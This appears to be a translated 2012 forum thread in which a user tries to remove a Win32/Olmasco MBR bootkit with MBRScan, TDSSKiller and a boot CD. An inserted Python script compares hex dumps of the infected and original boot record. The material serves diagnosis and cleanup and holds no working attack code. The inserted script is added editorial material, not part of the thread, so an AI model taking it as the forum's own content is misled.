0x01CF    00c1            ADD CL, AL   
0x01D1    ff0f            DEC WORD [BX]   
0x01D3    fe              DB 0xfe   
0x01D4    ff              DB 0xff   
0x01D5    ff32            PUSH WORD [BP+SI]   
0x01D7    6c              INSB   
0x01D8    4f              DEC DI   
0x01D9    12ce            ADC CL, DH   
0x01DB    2bf3            SUB SI, BX   
0x01DD    1200            ADC AL, [BX+SI]   
0x01DF    0000            ADD [BX+SI], AL   
0x01E1    0000            ADD [BX+SI], AL   
0x01E3    0000            ADD [BX+SI], AL   
0x01E5    0000            ADD [BX+SI], AL   
0x01E7    0000            ADD [BX+SI], AL   
0x01E9    0000            ADD [BX+SI], AL   
0x01EB    0000            ADD [BX+SI], AL   
0x01ED    0000            ADD [BX+SI], AL   
0x01EF    0000            ADD [BX+SI], AL   
0x01F1    0000            ADD [BX+SI], AL   
0x01F3    0000            ADD [BX+SI], AL   
0x01F5    0000            ADD [BX+SI], AL   
0x01F7    0000            ADD [BX+SI], AL   
0x01F9    0000            ADD [BX+SI], AL   
0x01FB    0000            ADD [BX+SI], AL   
0x01FD    0055 aa         ADD [DI-0x56], DL   

After this test the virus popped up and now I have its location too, but I only wrote it down and didn't even manage to take a screenshot, so I hope I write it correctly:
c:/documents and settings/monicka/desktop/Dump_Hdd0_DR0.old.mbr
infiltration
Win32/Olmasco.X trojan horse
info
cleaned by deletion, saved to quarantine
And it saved a file Dump_Hdd0_DR0.old to my desktop.
http://support.kaspersky.com/downloads/ ... killer.exe I downloaded this, but I can't run it.

And RogueKiller won't run for me either.
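A checker for the MBRScan output above, as an added example that is not from this thread or from the MBRScan tool: it parses the hex-dump lines, decodes the partition table, and compares the FAKED and ORIGINAL images region by region, so the pattern the scan reports (boot code replaced, partition table and disk signature untouched) can be confirmed from the bytes. The dump excerpts are copied from the scan output in this post; the region layout (code, disk signature at 0x1B8, table at 0x1BE, 0x55AA at 0x1FE) is the classic MBR, and all function names are mine.

```python
import re
from collections import namedtuple

# Excerpts of the two MBRScan hex dumps quoted in this thread: the first line and
# the 0x1A0-0x1FF tail (partition table) of the FAKED and ORIGINAL images. Offsets
# not copied here count as "unknown" in the comparison below.
FAKED_DUMP = r"""
0x00000000   31 C0 8E D0 BC 00 7C 0E 1F 0E 07 66 60 88 16 00   1À.м.|....f`...
0x000001A0   FD 5C 62 6F 6F 74 00 00 00 00 00 00 00 00 00 00   ý\boot..........
0x000001B0   00 00 A8 D3 17 78 BF F6 BA 41 BB 41 00 00 80 01   ..¨Ó.x¿öºA»A....
0x000001C0   01 00 07 FE FF FF 3F 00 00 00 F3 6B 4F 12 00 00   ...þ..?...ókO...
0x000001D0   C1 FF 0F FE FF FF 32 6C 4F 12 CE 2B F3 12 00 00   Á..þ..2lO.Î+ó...
0x000001E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001F0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA   ..............Uª
"""
ORIGINAL_DUMP = r"""
0x00000000   33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 1B 7C   3À.м.|ûP.P.ü¾.|
0x000001A0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001B0   00 00 00 00 00 2C 44 63 BA 41 BB 41 00 00 80 01   .....,DcºA»A....
0x000001C0   01 00 07 FE FF FF 3F 00 00 00 F3 6B 4F 12 00 00   ...þ..?...ókO...
0x000001D0   C1 FF 0F FE FF FF 32 6C 4F 12 CE 2B F3 12 00 00   Á..þ..2lO.Î+ó...
0x000001E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x000001F0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA   ..............Uª
"""

# Offset, then exactly sixteen hex byte pairs; the ASCII column is ignored.
HEX_LINE = re.compile(r"^0x([0-9A-Fa-f]{8})\s+((?:[0-9A-Fa-f]{2}\s+){15}[0-9A-Fa-f]{2})")
# Layout of a classic 512-byte MBR: (name, start offset, end offset exclusive).
REGIONS = [("boot code", 0x000, 0x1B8), ("disk signature", 0x1B8, 0x1BC),
           ("partition table", 0x1BE, 0x1FE), ("0x55AA signature", 0x1FE, 0x200)]
PartitionEntry = namedtuple("PartitionEntry", "index bootable type_id lba_start sectors")

def parse_dump(text):
    """Return a 512-entry list of byte values; None marks offsets absent from the excerpt."""
    image = [None] * 512
    for line in text.splitlines():
        m = HEX_LINE.match(line.strip())
        if m:
            off = int(m.group(1), 16)
            image[off:off + 16] = list(bytes.fromhex(re.sub(r"\s", "", m.group(2))))
    return image

def parse_partition_table(image):
    """Decode the four 16-byte entries at 0x1BE; empty slots (type 0) are skipped."""
    table = image[0x1BE:0x1FE]
    if any(b is None for b in table) or image[0x1FE:0x200] != [0x55, 0xAA]:
        raise ValueError("partition table incomplete or 0x55AA signature missing")
    raw, entries = bytes(table), []
    for i in range(4):
        e = raw[i * 16:(i + 1) * 16]
        if e[4] != 0:
            entries.append(PartitionEntry(i + 1, e[0] == 0x80, e[4],
                                          int.from_bytes(e[8:12], "little"),
                                          int.from_bytes(e[12:16], "little")))
    return entries

def size_gib(entry):
    """Partition size in GiB, assuming 512-byte sectors (MBRScan prints it as 'Go')."""
    return entry.sectors * 512 / 1024 ** 3

def compare_mbr(faked_text, original_text):
    """Per region: 'identical', 'differs', or 'unknown' when the excerpt has no bytes there."""
    a, b = parse_dump(faked_text), parse_dump(original_text)
    verdict = {}
    for name, lo, hi in REGIONS:
        pairs = [(x, y) for x, y in zip(a[lo:hi], b[lo:hi]) if None not in (x, y)]
        if not pairs:
            verdict[name] = "unknown"
        else:
            verdict[name] = "identical" if all(x == y for x, y in pairs) else "differs"
    return verdict

def looks_like_code_swap(verdict):
    """Pattern in the thread's scan: boot code replaced, partition table and disk signature kept."""
    return (verdict["boot code"] == "differs" and verdict["partition table"] == "identical"
            and verdict["disk signature"] == "identical")
```

Run on the excerpts, the comparison reports the boot code as different and the table, disk signature and 0x55AA marker as identical, and the decoded table gives the same 146.5 GiB bootable NTFS partition and 151.6 GiB second partition that MBRScan lists.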

Re: virus cannot be removed by antivirus

Posted: 18 Jul 2012 16:51
by hunterwx
Well, I hope it'll be fine now and that I understood you correctly, so when this box popped up: File already analysed

This file was already analysed by VirusTotal on 2011-10-18 09:33:47.

Detection ratio: 1/41

You can take a look at the last analysis or analyse it again now.
I clicked reanalyse, is that what you meant? I hope so, otherwise I probably completely misunderstood you; forgive my dumb approach to this.

c:\windows\explorer.exe
https://www.virustotal.com/file/8c7e8bc ... 342625505/


c:\windows\regedit.exe
https://www.virustotal.com/file/06cb6f4 ... 342625827/

c:\windows\system32\xcdzip32.dll
This one somehow won't scan any differently; it keeps showing 9 months even though I submitted it again and again, still the same as before :(
https://www.virustotal.com/file/cf84342 ... 342626481/

c:\windows\Installer\{90120000-0030-0000-0000-0000000FF1CE}\oisicon.exe
https://www.virustotal.com/file/094a403 ... /analysis/
And no, unfortunately I have nowhere to burn a CD/DVD, would it be needed? I only have this PC at home that I'm writing from now, but if necessary I could go to a friend.

Re: virus cannot be removed by antivirus

Posted: 19 Jul 2012 07:13
by hunterwx
Let me ask first to be safe: should I create that folder on the desktop, and does it matter what I name it, or should it have the same name as the program??

Re: virus cannot be removed by antivirus

Posted: 19 Jul 2012 13:09
by hunterwx
Now when I turned on the PC, that infiltration showed up again and it says:
infiltration found in memory
object -
operating memory - svchost.exe(1564)
infiltration
infiltration variant Win32/Olmasco.O trojan horse
info: cannot be cleaned
And I created a folder on the desktop, named it mbrscan, then ran the scan with everything checked again in options and clicked report, and here are the files. If I happened to do it wrong, write and I'll run it again exactly as you say.

Re: virus cannot be removed by antivirus

Posted: 19 Jul 2012 13:16
by hunterwx
Here it is pasted without me editing anything; I just ran the scan right away when it opened.

And I have the CD burned now.

Re: virus cannot be removed by antivirus

Posted: 19 Jul 2012 14:21
by hunterwx
I don't have any attachment here.

Re: virus cannot be removed by antivirus

Posted: 19 Jul 2012 14:26
by hunterwx
And another question: since TDSSKiller wouldn't even open for me before, will it work now?

Re: virus cannot be removed by antivirus

Posted: 19 Jul 2012 14:32
by hunterwx
And where do I find that mbrfix? And how is that environment started, from the drive?

So if I understood correctly, I should restart the PC after I unpack that file to C: and put the CD I burned in the drive? Then find that mbr fix in the programs and follow the rest of the instructions.

Re: virus cannot be removed by antivirus

Posted: 19 Jul 2012 14:40
by hunterwx
It told me that the system cannot run the specified program. I'll try the restart once more. It doesn't work even after that.

Re: virus cannot be removed by antivirus

Posted: 19 Jul 2012 14:49
by hunterwx
It opened my desktop normally, like always. Then I opened the CD and clicked that software; a command prompt opened where I copied the command from you, because when I opened the CD and clicked reatogo to load it, nothing happened. Now it has opened, but I don't have a desktop like you, only a window with choices, and I don't have mbrfix there. Does it need to be installed somehow first, or?

Re: virus cannot be removed by antivirus

Posted: 19 Jul 2012 14:56
by hunterwx
But the CD won't boot for me; I put it in the drive and nothing happens.

Re: virus cannot be removed by antivirus

Posted: 19 Jul 2012 15:04
by hunterwx
That's exactly what I wanted to ask, whether I should set the first boot to CD. OK, I'm going for it.